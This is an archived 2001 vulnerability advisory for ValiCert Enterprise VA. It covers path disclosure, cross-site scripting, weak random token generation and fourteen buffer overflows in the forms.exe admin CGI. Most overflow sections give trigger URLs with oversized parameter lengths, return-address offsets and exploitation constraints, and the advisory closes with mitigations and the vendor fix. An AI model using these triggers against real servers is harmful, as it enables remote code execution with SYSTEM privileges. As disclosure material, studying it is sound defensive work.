TUCoPS :: Web :: Apps :: web4896.htm

ValiCert Multiple Vulns
5th Dec 2001 [SBWID-4896]
COMMAND

	ValiCert

SYSTEMS AFFECTED

	ValiCert Enterprise VA v3.3 - 4.2.1 releases

PROBLEM

	NMRC   people   (Cyberiad   &   Phuzzy   L0gic)    found    multiple
	vulnerabilities  regarding  ValiCert,  which  provides  validity  status
	responses  for   X.509   certificates.   (multiple   buffer   overflows,
	cross-scripting  problem,  path  disclosure,   random   key   generation
	problem)
	

	Great job, guys !
	

	

	

	 Synopsis

	 --------

	

	Valicert Enterprise VA provides  validity  status  responses  for  X.509
	certificates and supports the following verification mechanisms:
	

	 - Certificate Revocation Lists

	 - CRL Distribution Points

	 - Online Certificate Status Protocol

	

	The Enterprise VA product architecture consists of:
	

	Enterprise  VA   Administration   Server   for   performing   management
	activities Enterprise VA Host Server for processing validation  requests
	VA API defining custom extensions to Enterprise VA.
	

	Numerous vulnerabilities have been located in a CGI script used  by  the
	Enterprise VA Administration Server ranging from  information  gathering
	to system compromise.
	

	[Taken from www.valicert.com] -  \"ValiCert  provides  secure  solutions
	for paperless e-business. Customers across the globe  use  our  products
	and services to help migrate costly or  inefficient  business  processes
	to the Internet, while maintaining  the  highest  degree  of  trust  and
	security.\"
	

	

	 Tested configuration

	 --------------------

	

	Testing was done with the following configurations:
	

	 Microsoft Windows NT Server 4.0

	 Microsoft Windows NT Service Pack 6a

	

	The Solaris version was also tested and found to be vulnerable  to  most
	of the overflow issues and one unique issue listed as issue #3.
	

	The vendor, ValiCert - www.valicert.com, has confirmed that all  of  the
	above named versions and operating systems are vulnerable.
	

	

	

	 Issue #1 - Path Disclosure

	 --------------------------

	

	A path disclosure issue exists in  the  forms.exe  CGI  script  used  by
	Valicert when an new extension is added. Valicert  can  be  extended  by
	adding new extensions  which  are  processed  by  custom  policies.  The
	following URL adds the extension, ldp:
	

	

	http://computer:13333/cgi-bin/forms.exe?extension=ldp&command=Add+Extension

	

	

	When an invalid extension, such as foobar, is provided in the  following
	URL:
	

	

	http://computer:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension

	

	

	the server returns an error page with the following text:
	

	

	Following Input/Configuration file is NOT FOUND in the required location.

	

	FILENAME = foobar

	LOCATION = D:\\Program Files\\ValiCert\\EnterpriseVA\\entserv

	

	Make sure the file is present in the above location and try again.

	

	

	Revealing the path to the Valicert installation.
	

	

	

	 Issue #2 - Cross Site Scripting Problem

	 ----------------------------------------

	

	Due to  the  lack  of  input  validation  and  filtering,  a  cross-site
	scripting issue exists in  the  certificate  creation  of  the  Valicert
	Administrative interface. A user creating a certificate can insert  HTML
	code into the descriptive fields. If the certificate is  viewed  through
	the Valicert Administrative server, the  HTML  is  interpreted  and  any
	scripting is executed. As an example, HTML code  can  be  inserted  into
	the organizational name which is interpreted upon  certificate  display.
	In doing so, a dialog box could be displayed, prompting the operator  to
	enter a password. Though it  is  not  possible  to  access  unauthorized
	resources, it could be used to engineer an individual administering  the
	Valicert server into entering sensitive data.
	

	If the Administrative server is protected with a  password,  only  those
	individuals  with  the  proper  username/password  can  create  such   a
	certificate containing malicious data in the fields.
	

	

	

	 Issue #3 - Random Key Generation Issue

	 --------------------------------------

	

	Valicert generates \'random\' tokens  for  communication  with  Hardware
	Security Modules (securely stores  digital  certificates)  using  the  C
	rand() function call. Furthermore,  the  C  rand()  function  is  seeded
	using local system time. Aside from  the  fact  that  the  value  is  in
	itself predictible, system clock ticks are generally not  finite  enough
	to be used as a good,  sole  source  of  entropy.  Seeding  using  local
	system time will guarantee  that  the  values  outputted  will  linearly
	increase.
	

	Lastly, if the \'/dev/urandom\' device exists, Valicert will use  it  by
	default for certificate  generation.  Although  for  most  purposes  the
	\'/dev/urandom\' device  is  sufficiently  safe,  it  does  not  perform
	blocking when its entropy pool is low. Taking  into  consideration  that
	within a PKI, non-repudiation (in the  business,  not  the  mathematical
	sense) is paramount, the behavior of the \'/dev/random\' device is  much
	more favourable.
	

	

	

	 Issue #4 - Multiple Buffer Overflows

	 ------------------------------------

	

	Multiple buffer overflows exist in the CGI script, forms.exe,  which  is
	used by the Valicert Enterprise VA Administration Server for  management
	activities. By default the Administration Server  listens  on  TCP  port
	13333 and can be configured to  require  a  username  and  password  for
	access.  Using  the  Apache   v1.3.6   web   server   for   Win32,   the
	Administration Server allows an operator to use a Web browser to:
	

	

	  configure the Enterprise VA Host server

	  start/stop the Enterprise VA Host server

	  request product keys and licenses

	  create key pairs

	  add certificates

	  add or modify certificate stores

	  add and configure extensions

	  view logs

	

	

	In  total,  fourteen  (14)  independent  and  exploitable  overflows  in
	parameters to forms.exe have been identified which allow for code to  be
	executed with SYSTEM privileges. If the Administrative Server  has  been
	configured to require a username and password for access,  the  attacker
	requires the correct username and password to launch these attacks.
	

	

	

	 Mode Overflow:

	 -------------

	

	The following URL is used to switch to server configuration mode,
	

	

	http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config

	

	

	Providing a mode string of 265 bytes overflows a buffer  during  a  copy
	located at 0x0040acf8 in forms.exe and  overwrites  the  return  address
	which is popped off the  stack  at  the  subroutine  return  located  at
	0x0040adf9.
	

	

	http://localhost:13333/cgi-bin/forms.exe?forms.exe?command=change_index_mode&mode={A x 265}

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 256 bytes long, followed by two pointers  or  32-bit  integers
	on the stack and then the return address.
	

	

	

	 Certificate_File Overflow:

	 -------------------------

	

	The following URL is used to create a Microsoft-type certificate.
	

	Providing a  Certificate_Files  parameter  of  1028  bytes  overflows  a
	buffer during a copy located at 0x0040599a in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x00405cb8.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?CertServerSelection

	=Microsoft&Certificate_Type=SHARE&Certificate_Files

	={A x 1028}&command=Submit+Certificate+Type

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1024 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 useExpiredCRLs Overflow:

	 ------------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the useExpiredCRLs parameter a value of 1288  bytes  overflows
	a  buffer  during  a  copy  located  at  0x0040b9dc  in  forms.exe   and
	overwrites the return address which is  popped  off  the  stack  at  the
	subroutine return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen

	=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs={A x 1288}&maxOCSPValidityPeriod

	=0&command=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 listenLength Overflow:

	 ---------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the listenLength parameter a value of 1288 bytes  overflows  a
	buffer during a copy located at 0x0040b54e in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength={A x 1288}&maxThread=16&maxConnPerSite=100&maxMsgLen

	=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 maxThread Overflow:

	 ------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the maxThread parameter a value  of  1288  bytes  overflows  a
	buffer during a copy located at 0x0040b5f3 in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread={A x 1288}&maxConnPerSite=100&maxMsgLen

	=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 maxConnPerSite Overflow:

	 -----------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the maxConnPerSite parameter a value of 1288  bytes  overflows
	a  buffer  during  a  copy  located  at  0x0040b67f  in  forms.exe   and
	overwrites the return address which is  popped  off  the  stack  at  the
	subroutine return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite={A x 1288}&maxMsgLen

	=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 maxMsgLen Overflow:

	 ------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the maxMsgLen parameter a value  of  1288  bytes  overflows  a
	buffer during a copy located at 0x0040b70b in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen

	={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	

	 exitTime Overflow:

	 -----------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the exitTime parameter a  value  of  1288  bytes  overflows  a
	buffer during a copy located at 0x0040b797 in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen

	=20000&exitTime={A x 1288}&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 blockTime Overflow:

	 ------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the blockTime parameter a value  of  1288  bytes  overflows  a
	buffer during a copy located at 0x0040b823 in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen

	=20000&exitTime=-1&blockTime={A x 1288}&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 nextUpdatePeriod Overflow:

	 -------------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the blockTime parameter a value  of  1288  bytes  overflows  a
	buffer during a copy located at 0x0040b8af in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen

	=20000&exitTime=-1&blockTime=5&nextUpdatePeriod={A x 1288}&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 buildLocal Overflow:

	 -------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the buildLocal parameter a value of  1288  bytes  overflows  a
	buffer during a copy located at 0x0040b950 in forms.exe  and  overwrites
	the return address which is popped  off  the  stack  at  the  subroutine
	return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen

	=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal={A x 1288}&useSoftwareSigning

	=Software&sslSigningType=Software&sslServerHost=&sslCertFile

	=sslCert.cert&sslPrivateKey=ssl.privkey&useExpiredCRLs

	=0&maxOCSPValidityPeriod=0&command=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 maxOCSPValidityPeriod Overflow:

	 ------------------------------

	

	The following URL is used  to  reconfigure  the  Valicert  server  which
	responds to validation requests.
	

	Providing the maxOCSPValidityPeriod parameter  a  value  of  1288  bytes
	overflows a buffer during a copy located at 0x0040ba68 in forms.exe  and
	overwrites the return address which is  popped  off  the  stack  at  the
	subroutine return located at 0x0040bb17.
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port

	=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen

	=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile

	=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType

	=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey

	=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod={A x 1288}&command

	=Submit+Configuration+Parameters

	

	

	Analysis of the code and  stack  contents  reveals  that  the  unchecked
	buffer is 1284 bytes long, immediately followed by  the  return  address
	on the stack.
	

	

	

	 extension Overflows:

	 -------------------

	

	Valicert can be extended by adding new extensions  which  are  processed
	by custom policies. Attempting to add an extension with a file  name  of
	995 bytes in  length  overflows  a  buffer  at  an  sprintf  located  at
	0x00417A9B in forms.exe while the error message to be displayed  to  the
	client is constructed. The long string  overwrites  the  return  address
	which is popped off the  stack  at  the  subroutine  return  located  at
	0x00417AD0.
	

	

	http://localhost:13333/cgi-bin/forms.exe?extension={A x 995}&command=Add+Extension

	

	

	Analysis of the code and stack  contents  reveals  that  the  subroutine
	starting at 0x0040FEC0 makes many unchecked copies while converting  the
	extension  parameter  to  an   absolute   filename   (i.e.   D:\\Program
	Files\\ValiCert\\EnterpriseVA\\entserv\\AAA..)    and    checking    for
	existence, etc. During the course of these copies,  terminating  null\'s
	in  (assumed)  fixed-length  buffers   containing   the   filename   are
	overwritten. As a result, the absolute filename passed to the  offending
	sprintf call is much longer than expected. A  solution  to  the  sprintf
	problem  will  still  leave  the  overflows  in  0x0040FEC0,  which  may
	possible be exploited.
	

	

	

	 Private Key Generation Overflow:

	 -------------------------------

	

	The operator can use the Administrative Server to generate  new  private
	keys for SSL  communications  or  use  in  signing  OCSP  responses.  An
	overflow exists in the processing of  requests  for  the  generation  of
	private keys. The following is one example of how this overflow  can  be
	triggered by requesting a new private key for SSL  communications.  Long
	strings in all other parameter values other than the:
	

	

	  country_name

	  gen_self_signed_cert

	  command

	  keytype

	

	

	parameters will  also  trigger  the  overflow  and  overwrite  a  return
	address on the stack. The following URL overwrites  the  return  address
	with the opt_company_name value (xxxx).
	

	[The following URL is line wrapped]
	

	

	http://localhost:13333/cgi-bin/forms.exe?country_name=XX&state_name

	=XX&locality_name=XX&org_name=XX&org_unit_name=X&common_name=X&email_address

	=X@X&challenge_password={A x 833}&opt_company_name=xxxx&gen_self_signed_cert

	=1&command=Submit+SW+Certificate+Request&keytype=BASIC%3BKEY_1

	

	

	Analysis of the code and stack contents reveals that the parameters:
	

	

	  country_name

	  state_name

	  locality_name

	  org_name

	  org_unit_name

	  common_name

	  email_address

	  challenge_password

	  opt_company_name

	

	

	are parsed and then reformatted using an  sprintf  statement  called  at
	0x402C2E8. The destination buffer is too small to  contain  the  results
	and overflows, overwriting the return address  with  the  value  in  the
	opt_company_name parameter. The corrupted return address is  popped  off
	the stack at 0x0040C58A. The following set of constraints  must  be  met
	for the overflow to occur:
	

	  a) The country_name parameter must be exactly two bytes long otherwise

	     the offending sprintf call is never reached.

	  b) The email_address parameter must be of the form string@string

	     otherwise the offending sprintf call is never reached.

	  c) The total length of all parameters must be 864 bytes for the result

	     from sprintf to overwrite the return address. Longer lengths will

	     cause the buffer overflow but will also overwrite parameters passed

	     to the subroutine, causing the CGI script to crash before the

	     subroutine terminates and pops off the corrupted return address.

	

	

SOLUTION

	NMRC offers the following suggestions to prevent  these  vulnerabilities
	from being exploited:
	

	If remote web administration is required, do so over an  SSL  connection
	to  prevent  the  admin  user  id  and  password  from  being  captured.
	Otherwise, blocking TCP port 13333,  which  is  used  for  remote  admin
	would prevent the overflows from being sucessful.
	

	Accordingly                        with                         ValiCert
	(http://www.valicert.com/support/security_advisory_eva.html) :
	

	All these consideration have been fixed in EVA 4.2.2 which is  currently
	available and can be obtained by contact support@valicert.com.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH